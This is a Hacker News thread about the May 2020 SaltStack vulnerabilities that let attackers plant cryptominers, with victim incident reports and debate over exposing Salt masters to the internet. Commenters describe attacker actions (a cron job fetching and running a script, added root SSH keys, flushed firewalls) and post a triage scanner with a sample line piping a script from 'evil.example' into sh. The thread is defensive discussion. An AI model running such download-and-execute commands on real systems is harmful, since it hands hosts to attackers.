Hacker News
SaltStack Mining Attack (saltexploit.com)
157 points by photon-torpedo on May 5, 2020 | 90 comments



>>> If you're here, chances are you're already compromised.

WTF does that mean? Our salt implementation is on an entirely private network, so why would I be more likely than not to be compromised already?

----

Edit: Re-downvotes -- This is a sincere question. Is there some evidence that the majority of salt implementations are compromised, or some mechanism by which this hits private networks? Or is that line just for dramatic effect?


I assumed that the problem was that if a master is accessible on your intranet, it could be hit with some sort of XSS attack from browsers inside the firewall.

But apparently there are 6000 people just straight up exposing their masters to the internet:

https://gbhackers.com/saltstack-salt/


> This whole "don't have your salt master exposed to the internet" thing has me annoyed. The whole point of salt is to manage boxes all over the place. I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again. I'm about to test binding salt-master to localhost and salt-minion to localhost and then setting up spiped to wrap the traffic...

Some companies need better DevOps apparently


Nitpick: this is purely an operations/sysadmin problem.

The DevOps grouping doesn't really apply here; operations-minded staff should be focused on keeping things locked down.

Unless, you know, you're not hiring those people and instead are hoping that developers take the Ops burden. ;)


People downvoting: I guess I hit a nerve, but could you explain why?

Development and Operations are different disciplines and the idea was to remove silos, not make one person responsible for both.


But that's like half the point of SaltStack. It's supposed to be secure enough to run on the public internet to manage road-warrior endpoints.

"I found this site called Alexa that lists a bunch of companies that just straight up expose their web servers to the internet. Crazy."

And I have some bad news about how many companies are exposing their VPN servers to the internet too.


It's really not.

You also wouldn't expose your database just because it's password-protected, would you?

I bet all these public servers have a firewall running to protect other services.

Shouldn't be hard to include the saltstack port(s) and whitelist the relevant IP addresses.
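A minimal sketch of what that could look like, assuming the default Salt master ports (4505 for publish, 4506 for request/return) and a placeholder minion range:

    # Allow Salt's default master ports only from a known minion range
    # (203.0.113.0/24 is a placeholder), then drop everything else.
    iptables -A INPUT -p tcp -s 203.0.113.0/24 --dport 4505:4506 -j ACCEPT
    iptables -A INPUT -p tcp --dport 4505:4506 -j DROP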

Also, the main difference from your example is that the clients that connect to web servers and VPNs are either not known in advance or don't have static IP addresses.


You can't really compare Salt to a password-protected database. SSH is probably a better comparison, as both use public-key crypto and plenty of servers are exposed on the internet via it. It's just that Salt hasn't been audited as heavily as OpenSSH or other SSH implementations, so it's risky to expose Salt to the internet, but I can see why some admins might do it.


Anyone who's putting their Salt master on the internet is having to deal with clients without fixed addresses. And it's not uncommon to have to deal with clients that aren't known in advance, which is when autosign scripts are used.

Sans the current CVE, this is otherwise a service that is safe to expose to adversarial networks.


From Algolia's outage retrospective:

  What we did so far:
  We’ve secured the impacted SaltStack service by updating it and adding additional IP filtering, allowing only our servers to connect to it.

So clearly unrestricted access wasn't a necessity.

I understand it's a pain. I've been running a 1000+ server stack with Puppet on a public network and relied on iptables to secure it. But I'd rather cope with the daily iptables rules update than have to fight a 0-day exploit...


I would (and do) expose my database to the internet, because it's properly secured (client certificates rather than just passwords).

I don't run firewalls. If a service doesn't need to be exposed, the port isn't open. Means no worrying about who has access to the wifi (because that's outside the security boundary) and no mucking about with VPNs when accessing remotely.


>because it's properly secured

That's what these Saltstack users thought too until this week.


People are saying they used a hand-rolled crypto stack rather than something standard like TLS? That should have been a massive red flag.


> road-warrior endpoints

would or could often have a VPN tunnel back to some static infrastructure; that, and not the public network, can be used for management


Right, except that registering with the salt master is how your VPN is provisioned.



>>>> If you're here, chances are you're already compromised.

> WTF does that mean?

The website assumes that if you dropped by or googled the vulnerability, it's because you had saltstack exposed to the public internet.

You don't have to react so harshly to that turn of phrase.


My main impression was that this site was blurring the line between professional "Bulletin" and scare-mongering.

> Even if you didn't notice any unexpected symptoms, please: nuke and restart.

If I were writing this, I'd probably write something like: "On May x, a remote-code-execution vulnerability in (all versions?) of public salt-masters (not minions?) was unveiled. Shortly thereafter, actual exploitation began in the wild. If your salt installation uses a salt-master, and it's internet-reachable, it may already be compromised, along with much of your infrastructure. Section 2 covers how to see if you are infected, and Section 3 how to remove the infection."


> Section 2 is how to see if you are infected and Section 3 is how to remove the infection

That's much worse. It implies there is a reliable way to detect and remove the infection, which is not the case. This website documents some known attacks, but there's a high chance the vulnerability was also exploited with additional payloads.

There's no way to know if you were hit with a rootkit that persists itself in the bootloader or other parts of your system. There's no way to know if you were infected or not.

The only way to be sure is to nuke the machine, as they said.

Security advice should always err on the safe side for a naive reader.


With you on this one... a coworker put it well: "[this tone is] at a 9, it needs to be at a 3".


99% of companies I've encountered running SaltStack are masterless anyway.


Salt is a bit of a rarity among ops people, but the funny thing is my experience is the opposite of yours: 66%+ of the companies I see with Salt run it in master/minion mode. I prefer it over Ansible when my SSH settings are super awkward (MFA, multiple bastions, etc.) to integrate into an Ansible inventory file. At one place with 900+ hosts, 300+ random IP ranges, and tons of (badly written) compliance requirements, I spent about 3 weeks trying to get an inventory file hacked up, gave up, and deployed Salt within a day for the basics I needed: running shell commands from a single point of control.


Most of the places I've seen it are banks. Oddly.

Your use case makes absolute perfect sense though -- nice!


Depends on their use case.

IMO, Salt's best feature is probably running with the master/minion setup, because the minion connects out to the master. Masterless is handy in conjunction with Vagrant, Packer, or another provisioning tool, not so much for managing the lifecycle of a server / OS.


I'm not clueless. I know this. This doesn't detract at all from what I said.

In production, an outsized number of companies are using SaltStack a certain way.

The reason comes down to the way we all evaluate business risk. I could have said that, out of all the companies I've worked with using Salt that have compliance requirements, 100% of them are using it masterless, but then some smart-ass would have piped up with a "not me" comment.


How would you compare it to Ansible in that usage model? I don't do much config mgmt these days, so I'm curious: for a master(less) mindset, what's the comparison for Salt vs. Ansible?


Ansible gets a ton more use. Its push model is highly favored in IT organizations. Salt's event/reactor system has tricks Ansible can't do.


Not me


not me :D


SaltStack has a long history of home brew protocols, internally written encryption, security issues, and bugs. I'm not surprised they would end up being used as a vector for attacks.


See also the F-Secure timeline, where the Salt team's GPG key had been expired for years, and there was a lack of clear communication and general sloth in the response:

https://labs.f-secure.com/advisories/saltstack-authorization...


Exhibit A: CVE-2013-2228.

As described in the relevant entry [0] on Debian's Security Tracker:

> SaltStack RSA Key Generation allows remote users to decrypt communications

The fix [1]:

  - gen = RSA.gen_key(keysize, 1, callback=lambda x, y, z: None)
  + gen = RSA.gen_key(keysize, 65537, callback=lambda x, y, z: None)
---

[0]: https://security-tracker.debian.org/tracker/CVE-2013-2228

[1]: https://github.com/saltstack/salt/commit/e8ce66cf688b43aeb3e...


The second parameter in the gen_key function is the RSA public exponent. I believe this means the ciphertext will be the same as the padded plaintext.

Here is the documentation for the RSA.gen_key() function:

    def gen_key(bits, e, callback=keygen_callback):
        # type: (int, int, Callable) -> RSA
        """
        Generate an RSA key pair.

        :param bits: Key length, in bits.

        :param e: The RSA public exponent.

        :param callback: A Python callable object that is invoked
                         during key generation; its usual purpose is to
                         provide visual feedback. The default callback is
                         keygen_callback.

        :return: M2Crypto.RSA.RSA object.
        """
https://gitlab.com/m2crypto/m2crypto/-/blob/master/M2Crypto/...
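To make the impact concrete: textbook RSA computes c = m^e mod n, so with e = 1 the "ciphertext" is just the padded message back. A toy sketch in Python (the numbers are arbitrary toy values, not real key sizes):

```python
# Textbook RSA: c = m^e mod n. With e = 1, encryption is the identity map.
n = 3233          # toy modulus (61 * 53); real keys are 2048+ bits
message = 1234    # the padded plaintext, as an integer < n

broken = pow(message, 1, n)      # e = 1, as in the vulnerable code
fixed = pow(message, 65537, n)   # e = 65537, as in the fix

print(broken == message)  # True: "encrypting" returned the plaintext
print(fixed == message)   # False
```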


This is reminiscent of

    int getRandomNumber()
    {
        return 4;  // chosen by fair dice roll.
                   // guaranteed to be random.
    }


Jesus that's some rookie stuff right there


They also built their own low-level network protocol based on 0mq. Back when I tried it, it had constant keepalive issues behind NAT and would randomly lose messages (that was in 2014, probably better now).


It wasn't any better as of last year, and its constant connectivity issues were part of the reason I abandoned it.


This is rookie stuff, but it's a recurring security issue: crypto libraries have APIs littered with footguns. The "lambda x, y, z: None" just strikes me as cargo-culted copy-paste code. I'm willing to bet there is other software with the same exploit, as they all copied the same answer on StackOverflow.


Attributing this just to Salt is deeply unfair. Ansible has had many similar issues over time, also homebrew encryption etc.


Ansible doesn't have a server to expose, let alone publicly. It could be just as bad internally and still be safer. (So Puppet, for example, would also make me nervous.) Now, I suspect Ansible is also in a better position because it's mostly SSH-based, but the architecture also inherently makes it harder to have this level of problem.


What about AWX/Tower? It offers both a GUI and REST interface to the playbooks.


Yep, anything that makes it a server process that listens for connections definitely takes you into the same category. Likewise, running puppet or salt in the local-only mode removes the issue from them.


Serverless isn't a cure-all. Ansible has had numerous code exec bugs due to e.g. interpreting strings coming back from remote machines or third party APIs as templates.

Some of these bugs aren't even that old


> Ansible has had numerous code exec bugs due to e.g. interpreting strings coming back from remote machines or third party APIs as templates.

Sure, and that is bad, but the exposure is still way smaller. Let's say Ansible has a bug that allows code execution on my machine by any target server or API, and Salt has a bug that allows code execution on the master server. In that case, the Salt server will be owned by script kiddies within hours, and the only way to stop it is me killing it or restricting access. But the Ansible bug can't be passively exploited without me running it, and can only be exploited by my own servers or vendors when I decide to interact with them. I don't actually expect AWS/DO/whoever to attack me, and my own servers could be compromised, but that's a much less likely jumping-off point for an attack.


Both Ansible and Salt are underengineered, but highly convenient.


And this attack payload would have hit Ansible servers just as hard. Looking at the payload script, if the SSH keys were not password-protected it would have logged into the servers: https://github.com/Aldenar/salt-malware-sources/blob/master/...


Once it had root access it would have hit anything hard. But it wouldn't have been able to get root access in the first place, because Ansible doesn't have a port listening on the internet.


Ansible is relying on SSH for security and does not use any homebrew crypto or protocols by default.


https://linux.die.net/man/3/ansible.fireball

It definitely has them, however.


You can use salt over SSH, but it is not the default.


ansible-vault is homebrew crypto


It uses the standard cryptography or pycrypto backends, same as everything else.


> homebrew crypto

AES-256?


I don't understand this claim. ansible-vault uses AES256 which is anything but homebrew.


This is why, like me, you're not a cryptographer. AES-256 is a cipher; it's one component of a cryptosystem. Analysing cryptosystems is a complex area that does not involve vetting software for buzzwords.

I can take AES256 and make it output the image here: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation...

That's not supposed to happen. Where homebrew diverges from cryptography is that the former involves engineers like us connecting buzzwords together and producing images like the one in that Wikipedia article; the latter involves complex math and rigorous peer review.


I think you're just trolling


Salt uses AES too. The problem is it puts together standard primitives in homebrew protocols. Cryptographic protocol design is as likely to mess your system up as cryptographic primitive design.


What "home brew" protocols and encryption does Salt use?


Something about Salt has always rubbed me the wrong way. I'd rather stick with Puppet, Chef, or CF Engine if I was considering this tool.


I'm all about IT automation and like the tech a lot, but after running SaltStack for 5 years, I decided to transition to plain old written documentation. When you consider everything that underlies the "infrastructure as code" tech stack, it ends up being an extremely steep learning curve. I was very productive with SaltStack but turned into the only person who could write or edit our deployment scripts. It was a bad situation.

Now, nine months after dropping SaltStack, my colleagues are editing the docs I've created, and more importantly, they're also writing their own. That's a huge win. What I've lost in terms of personal productivity, I've regained in terms of wider participation in our standardization and documentation efforts.

I might slowly re-introduce IT automation technologies, maybe something more popular like Ansible or Docker, but only after making sure the rest of my team has a solid understanding of general IT automation concepts. I think we're on the right track. I had a colleague today ask me about what Python programming certification they should get, so I pointed them toward Google's Python-based IT automation course on Coursera. I supported another colleague's efforts to create a library of standard server images based on our internal deployment standards for one of our private clouds, and I'm encouraging them to expand that work to our other data centers. And so on. The team as a whole works better together, so that's where I'm staying focused.


Are you seriously telling me that you went from infrastructure as code to doing things by hand!?


We were always doing things by hand. I was the only one doing any kind of IT automation, and I failed to account for the learning curve of my tooling when trying to expand its use. At least now, the entire team—not just me—is doing a better job of documenting what they're doing by hand.

The reality is that devops toolchains are really complex. For example, using SaltStack the way I had things set up meant learning:

- SaltStack's domain-specific programming language, which amounts to writing Python in YAML

- their macro preprocessor, Jinja, which has completely different syntax and semantics from their DSL

- a programming text editor that supports YAML and Jinja

- Git and GitHub

- secrets management (and there were huge risks here)

- the general concepts of IT automation and infrastructure-as-code
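
For anyone who hasn't seen those first two layers together, here's a small made-up state file (the package names and the grain check are just illustrative):

    # webserver.sls -- Jinja is rendered first, then the result is parsed
    # as YAML into Salt state declarations ("Python in YAML").
    {% if grains['os_family'] == 'Debian' %}
    {% set pkg = 'apache2' %}
    {% else %}
    {% set pkg = 'httpd' %}
    {% endif %}

    webserver:
      pkg.installed:
        - name: {{ pkg }}
      service.running:
        - name: {{ pkg }}
        - require:
          - pkg: webserver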

Learning (never mind teaching) that tech stack is really hard. For example, the Google IT Automation with Python certification on Coursera is an 8-month-long course. That's just one bullet point on the above list, and that list doesn't include all the things I wanted to do on top of SaltStack, namely the continuous integration/continuous testing stuff, which would involve learning:

- the Chef InSpec DSL, which is based on Ruby

- branching and tagging

- release engineering

- test-driven development as a software engineering methodology

- software engineering methodology in general

We were struggling with even just writing good documentation, but there I was asking everyone to write good code. That's orders of magnitude harder. It was too much, like asking somebody to run a marathon without any training. I don't care how fit you are. That's just not going to happen.


So you went from full automation to... Copying and pasting by hand?


We all got lucky on this one. The outcome could have been much worse, like secrets leaking or an rm -rf. We record everything that SaltStack does, and the scripts didn't even upload anything from the infected servers.


You may have been lucky, but that was not the case for everyone. Some of the entries appear to be missing, but last night someone set up a honeypot and was posting what they saw.

Adding keys to /root/.ssh/authorized_keys, scp'ing sshkeys, flushing iptables.

I am of course one of the idiots that had it exposed to the internet. I wouldn't do it with a database, but I didn't think twice about salt. Where was my head!


Those things you listed are easily fixed which is what I assume they meant by lucky.


Our servers were affected. The attackers added a cronjob that ran every minute, wgetting a .sh file and executing it. Most of the time the server hosting the file was either offline or returned a 404, but every once in a while it returned the malicious script. When the script got executed, it killed our nginx server, which is how we noticed something odd was happening. If it weren't for nginx dying, we might never have noticed we were infected.

Here's the contents of the sh script for the curious. https://pastebin.com/CbupwQMG
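If you want a quick first pass before nuking a box, here's a rough triage sketch of the kind of indicator scan people were running. The patterns are examples drawn from published payload write-ups, not a complete list, and a clean scan proves nothing:

```python
import re

# Example indicators from published write-ups of this campaign; a rough
# triage aid only -- absence of matches does NOT mean a box is clean.
INDICATORS = [
    r"salt-store",         # dropped miner binary name seen in reports
    r"wget\s+\S+\.sh",     # cron entries fetching a shell script
    r"iptables\s+-F",      # payloads flushing firewall rules
]

def scan(text):
    """Return the indicator patterns that match anywhere in `text`."""
    return [p for p in INDICATORS if re.search(p, text)]

# e.g. feed it /etc/crontab, /var/spool/cron/*, /root/.ssh/authorized_keys
print(scan("* * * * * root wget http://evil.example/sa.sh -O- | sh"))
```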


Looks like it goes through a massive amount of effort to eliminate competing miners and malware. Should neuter that script and run it periodically on boxes :)


Very helpful. Thank you for sharing.


This hit RamNode too.

> This message is to customers with VPSs on our legacy SolusVM system.

> At approximately 20:34 eastern (GMT -4) on May 2, recently published SaltStack vulnerabilities (CVE-2020-11651, CVE-2020-11652) were used to launch cryptocurrency miners on our SolusVM host nodes. The attack disrupted various services in order to allocate as much CPU as possible to the miners. SSH and QEMU processes were killed on some of our CentOS 6 KVM hosts, causing extended downtime in certain cases.

> Upon detecting the disruption, we quickly began to re-enable SSH, disable and remove Salt, kill related processes, and boot shutdown KVM guests. After careful analysis of the exploit used, we do not believe any data was compromised.

> RamNode was not specifically targeted, but rather anyone running SaltStack versions prior to the one released a few days ago (April 29).


> After careful analysis of the exploit used, we do not believe any data was compromised.

If someone had code running as root on their machine, they can't say that statement with any confidence whatsoever.


> If someone had code running as root on their machine, they can't say that statement with any confidence whatsoever.

Indeed, I think you need to assume all guests running on the affected nodes are now compromised.


Algolia got impacted too; apparently their Salt masters were open to the whole internet: https://blog.algolia.com/salt-incident-may-3rd-2020-retrospe...


One of DigiCert's Certificate Transparency logs was likewise open to the entire Internet -- and likewise compromised [0]:

> I'm sad to report that we discovered today that CT Log 2's key used to sign SCTs was compromised last night at 7 pm via the Salt vulnerability.

Several other "high-profile" sites have been compromised as well, including LineageOS and Ghost. I expect we'll hear of many more in the next few days.

---

[0]: https://groups.google.com/a/chromium.org/forum/m/#!topic/ct-...


This impacted ghost.org hosting really badly: https://status.ghost.org/



Oh god, the responses. Half of them are completely unrelated, asking Lineage to support particular phones.

And then there's someone who saw "salt" and tried to help:

https://twitter.com/mvonwi/status/1256989787321438209


Debian hasn't fixed this yet in their packaging, so you might want to work around that if you're using it as a salt-master server.

https://security-tracker.debian.org/tracker/CVE-2020-11651


I'm so grateful this happened over the weekend, when I had time to respond. My girlfriend woke me up and told me the CPU fan was going crazy in the living room. I realize this isn't the case for everyone; I extend my deepest sympathies to those affected.


Former SaltStack user here. If you're using it, just stop. Switch to Ansible, a Kubernetes/Helm/Flux solution or experiment with Chef Habitat if you're feeling futuristic. SaltStack is just bad. It's buggy, clunky and has really bad error messages. Its only saving grace is that it came before Ansible, but that's only relevant in a historical context. Just no.


None of those are compatible solutions.

Ansible is very inflexible when it comes to configuration and how you structure your playbooks.

Kubernetes/Helm/Flux only works if you're inside k8s. I don't know why you would be using Salt for that.

Chef Habitat looks nice, but again, I'm doing more than just management of applications.

The only real alternative to Salt is Puppet. So, no. Just no.


SaltStack is definitely the underdog compared to Puppet, Chef, or Ansible.

But I can chime in on why we use it:

1) First-class Windows support (or as first-class as it gets), with no need to enable WinRM (which is much more difficult than just installing a salt-minion on first boot).

2) It scales really well; I can run hundreds of thousands of commands in parallel. Ansible can't do that; it gets very starved on CPU.

3) It's push-based (unlike Chef, which you have to run on the client node itself, causing people to cron-job it).

4) It's easily extended; writing custom modules is very easy and pleasant.

---

Now, saying all of that, Salt has warts. Like, hundreds, maybe thousands. It's not uncommon that I find something that's just broken or bugged. Often upgrading fixes one bug but introduces three more. I feel like this might be caused by being an underdog, but it's a real drawback that makes me cautious when recommending it.


Packer with Salt Masterless has been fine though.


We got hit by this on Saturday night :|


How do things like this affect Monero's reputation?

I saw Monero mining in JS libraries; now it's in virus form.

Thus, why Monero? Does Monero somehow discourage these "practices"?


IIRC one of Monero's design goals is that it isn't easily GPU/ASIC-mineable, so CPU mining is competitive. It's also designed to be difficult to trace.

Both of these properties make it a relatively safe and profitable avenue for malware authors.


Mining with JavaScript or WebAssembly is no longer viable as being competitive now requires using a JIT compiler.

Nothing can really be done about it. Pool operators can ban the wallet addresses of known bot masters from connecting to their pool, but you can't really ban someone from participating in an anonymous decentralised network.


Maybe it's to do with the fact that monero tokens are non-fungible, unlike some other crypto-currencies.


I think you mean 'fungible'. Non-fungible means 1 XMR is not equivalent to another 1 XMR. The use of ring signatures, key images and transaction amount hiding gives Monero its fungible properties. This makes it computationally difficult to trace a particular transaction graph. This provides fungibility beyond that of Nakamoto style coins, in that you cannot easily block/identify addresses or transactions.


Monero is likely the absolute most fungible cryptocurrency.



